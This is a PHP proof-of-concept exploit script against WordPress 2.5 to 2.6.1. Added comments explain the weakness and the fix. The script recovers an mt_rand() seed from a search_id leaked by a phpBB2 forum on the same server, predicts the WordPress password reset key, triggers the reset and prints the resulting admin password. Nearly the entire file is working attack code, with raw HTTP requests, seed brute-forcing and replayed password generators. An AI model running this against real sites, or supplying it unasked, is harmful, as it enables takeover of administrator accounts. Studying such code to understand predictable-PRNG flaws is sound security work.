<?php
// Proof-of-concept for a predictable-PRNG weakness: the WordPress password
// reset key was derived from mt_rand(), whose seed this script recovers from
// a value leaked by a co-hosted phpBB2 installation.  The root cause on the
// defender side is seeding security tokens from mt_rand()/mt_srand(); the
// fix is to generate reset keys and new passwords from a CSPRNG
// (random_bytes()/random_int() in current PHP) and never from mt_rand().
echo "------------------------------------------------------------------\n";
echo "Wordpress 2.5 <= 2.6.1 through phpBB2 Reset Admin Password Exploit\n";
echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
echo "------------------------------------------------------------------\n";
// Usage banner; the script needs at least the two base URLs.
if ($_SERVER['argc']<3) {
    echo "USAGE:\n";
    echo "~~~~~~\n";
    echo "php {$_SERVER['argv'][0]} [wp] [phpbb] OPTIONS\n\n";
    echo "[wp] - target server where Wordpress is installed\n";
    echo "[phpbb] - path to phpBB (must be located on the same server)\n\n";
    echo "OPTIONS:\n";
    echo "--wp_user=[value] (default: admin)\n";
    echo "--search=[value] (default: `site OR file`)\n";
    echo "--skipcheck (force exploit not to compare PHP versions)\n";
    echo "examples:\n";
    echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://site.com/forum/\n";
    echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://samevhost.com/forum/ --wp_user=lol\n";
    die;
}
// No execution-time limit: search_seed() below may iterate up to 10^6 times.
set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);
$wp = $_SERVER['argv'][1];
$phpbb = $_SERVER['argv'][2];
// Optional flags.  Note: strpos()!==false matches the flag anywhere in the
// argument, and explode("=") only keeps the first "=" separated part, so a
// value containing "=" is silently truncated.
for($i=3;$i<$_SERVER['argc'];$i++){
    if(strpos($_SERVER['argv'][$i],"--wp_user=")!==false) {
        list(,$wp_user) = explode("=",$_SERVER['argv'][$i]);
    }
    if (strpos($_SERVER['argv'][$i],"--search=")!==false) {
        list(,$search) = explode("=",$_SERVER['argv'][$i]);
    }
    if (strpos($_SERVER['argv'][$i],"--skipcheck")!==false) {
        $skipcheck=true;
    }
}
if(!isset($wp_user))$wp_user='admin';
if(!isset($search))$search='site OR file';
// Both URLs must resolve to the same IP: the script relies on both apps
// being served by the same PHP process pool so that one mt_rand() state is
// shared between them (presumably; nothing below verifies this directly).
$wp_parts = @parse_url($wp);
$phpbb_parts = @parse_url($phpbb);
if(isset($wp_parts['host']))$wp_ip = gethostbyname($wp_parts['host']);else die("[-] Wrong parameter given\n");
if(isset($phpbb_parts['host']))$phpbb_ip = gethostbyname($phpbb_parts['host']);else die("[-] Wrong parameter given\n");
if($wp_ip!=$phpbb_ip) die("[-] Web apps must be located on the same server\n");
$phpbb_host = $phpbb_parts['host'];
if(isset($phpbb_parts['port']))$phpbb_port=$phpbb_parts['port']; else $phpbb_port=80;
if(isset($phpbb_parts['path']))$phpbb_path=$phpbb_parts['path']; else $phpbb_path="/";
if(substr($phpbb_path,-1,1)!="/")$phpbb_path .= "/";
$wp_host = $wp_parts['host'];
if(isset($wp_parts['port']))$wp_port=$wp_parts['port']; else $wp_port=80;
if(isset($wp_parts['path']))$wp_path=$wp_parts['path']; else $wp_path="/";
if(substr($wp_path,-1,1)!="/")$wp_path .= "/";
// First request: fetch wp-login.php (over the phpBB ip/port, with the WP Host
// header) to fingerprint the WordPress version and the server's PHP version.
echo "[~] Connecting... ";
$sock = fsockopen($phpbb_ip,$phpbb_port);
if(!$sock)die("failed\n"); else echo "OK\n";
$packet = "GET {$wp_path}wp-login.php HTTP/1.0\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: close\r\n\r\n";
$resp='';
fputs($sock,$packet);
while(!feof($sock)) { $resp.=fgets($sock); }
fclose($sock);
// The "login.css?ver=" marker is used as the 2.6-vs-earlier discriminator and
// selects which password generator is replayed later.
if(preg_match('@HTTP/1\.(0|1) 200 OK@i',$resp)){
    if(preg_match('@login\.css\?ver=([\d\.]+)\'@',$resp)) $wp26=true; else $wp26=false;
} else die("[-] Can't obtain wp-login.php\n");
// mt_rand() output differs across the 5.2.6 boundary, so the local
// interpreter must be on the same side of it as the server's (read from the
// X-Powered-By header, which a hardened server would not expose at all).
if(!isset($skipcheck)) {
    echo "[~] Comparing PHP versions... ";
    $out=array();
    preg_match('@x-powered-by: *PHP/([\d\.]+)@i',$resp,$out);
    if(!isset($out[1]))die( "failed\n[-] Can't get PHP version\n");
    else {
        // version_compare() with two arguments returns -1/0/1; the check only
        // passes when both results are non-zero or both are zero.
        if(!(version_compare($out[1],'5.2.6') && version_compare(phpversion(),'5.2.6')) && !(!version_compare($out[1],'5.2.6') && !version_compare(phpversion(),'5.2.6')) ) {
            die("failed\n[-] Server's and local PHP versions are unacceptable\n");
        }
    }
    echo "OK\n";
}
// One keep-alive connection is used for the remaining requests.  Unlike the
// first fsockopen() above, this return value is never checked for failure.
$ock = fsockopen($phpbb_ip,$phpbb_port);
echo "[~] Sending request to $phpbb\n";
$data = "search_keywords=".urlencode($search)."&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200";
$packet = "POST {$phpbb_path}search.php?mode=results HTTP/1.1\r\n";
$packet.= "Host: {$phpbb_host}\r\n";
$packet.= "Connection: keep-alive\r\n";
$packet.= "Keep-alive: 300\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;
fputs($ock, $packet);
sleep(5);
$resp='';
// Read the phpBB response line by line until a search_id appears.  $resp is
// overwritten (not appended) per line here, and `break` leaves the rest of
// this response unread on the keep-alive socket.
while(!feof($ock)) {
    $resp = fgets($ock);
    preg_match('@search.php\?search_id=(\d+)&@',$resp,$search);
    if(isset($search[1])) {
        $search_id = (int)$search[1];
        echo "[+] search_id is $search_id\n";
        break;
    }
}
if(!isset($search_id)) die("[-] search_id Not Found, try the other --search param\n");
// Trigger the WordPress "lost password" flow for $wp_user.
echo "[~] Sending request to $wp\n";
$data = "user_login=".urlencode($wp_user)."&wp-submit=Get+New+Password";
$packet = "POST {$wp_path}wp-login.php?action=lostpassword HTTP/1.1\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: keep-alive\r\n";
$packet.= "Keep-alive: 300\r\n";
$packet.= "Referer: {$wp}/wp-login.php?action=lostpassword\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;
fputs($ock,$packet);
// Recover the seed that produced search_id (brute force over 0..10^6), then
// replay the same generator locally.  This is the whole weakness: a
// mt_srand()-seeded sequence is reproducible once one output is known.
$seed = search_seed($search_id);
if($seed!==false) echo "[+] Seed is $seed\n"; else die("[-] Seed Not Found\n");
mt_srand($seed);
mt_rand();
if($wp26) $key = wp26_generate_password(20, false); else $key = wp_generate_password();
// NOTE(review): the trailing "\ " is a literal backslash+space in PHP; it
// looks like a mangled "\n", so this line prints without a line break.
echo "[+] Activation key should be $key\ ";
echo "[~] Sending request to activate password reset\n";
$packet = "GET {$wp_path}wp-login.php?action=rp&key={$key} HTTP/1.1\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: close\r\n\r\n";
fputs($ock,$packet);
// Accumulates everything still on the socket: the unread tail of the search
// response, the lostpassword response and the rp response, in that order.
while(!feof($ock)) { $resp .= fgets($ock); }
// Error detection matches the English and Russian WordPress messages.
if(preg_match('/(Invalid username or e-mail)|(пользователь отсутствует в базе данных)|(Неправильное имя пользователя)/i',$resp)) die("[-] Incorrect username for wordpress\n");
if(strpos($resp,'error=invalidkey')!==false) die("[-] Activation key is incorrect\n");
// The new password is the next output of the same (still seeded) generator.
if($wp26) $pass = wp26_generate_password(); else $pass = wp_generate_password();
echo "[+] New password should be $pass\n";

/**
 * Brute-force the mt_srand() seed whose first mt_rand() output equals
 * $rand_num.  Seeds 0..1000000 are tried in order; this only works when the
 * server's first mt_rand() draw after seeding is the leaked value, which is
 * an assumption of this script rather than something it verifies.
 *
 * @param int $rand_num  the leaked mt_rand() output
 * @return int|false     the seed, or false when none matches in range
 */
function search_seed($rand_num) {
    $max = 1000000;
    for($seed=0;$seed<=$max;$seed++){
        mt_srand($seed);
        $key = mt_rand();
        if($key==$rand_num) return $seed;
    }
    return false;
}

/**
 * Local copy of the WordPress 2.6-era password generator, replayed against
 * the caller's mt_rand() state.  Each draw is mt_rand(0, strlen($chars)-1),
 * so the output is fully determined by the current seed.
 *
 * @param int  $length         number of characters to produce
 * @param bool $special_chars  whether to extend the alphabet with !@#$%^&*()
 * @return string
 */
function wp26_generate_password($length = 12, $special_chars = true) {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    if ( $special_chars ) $chars .= '!@#$%^&*()';
    $password = '';
    for ( $i = 0; $i < $length; $i++ )
        $password .= substr($chars, mt_rand(0, $length ? strlen($chars) - 1 : 0), 1);
    return $password;
}

/**
 * Local copy of the pre-2.6 generator: seven draws of mt_rand(0, 61) over a
 * fixed 62-character alphanumeric alphabet, again fully seed-determined.
 *
 * @return string
 */
function wp_generate_password() {
    $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    $length = 7;
    $password = '';
    for ( $i = 0; $i < $length; $i++ )
        $password .= substr($chars, mt_rand(0, 61), 1);
    return $password;
}
?>